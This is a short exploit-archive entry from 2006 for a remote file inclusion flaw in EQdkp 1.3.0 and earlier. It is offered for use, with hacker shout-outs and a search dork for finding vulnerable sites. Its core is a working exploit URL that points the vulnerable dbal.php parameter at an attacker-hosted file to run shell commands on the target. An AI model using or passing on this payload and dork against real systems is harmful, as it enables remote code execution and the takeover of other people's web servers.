[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability
# Published : 2006-05-07
# Author : OLiBekaS
# Previous Title : AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit
# Next Title : HiveMail <= 1.3 (addressbook.add.php) Remote Code Execution Exploit


Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# www.Syue.com [2006-05-07]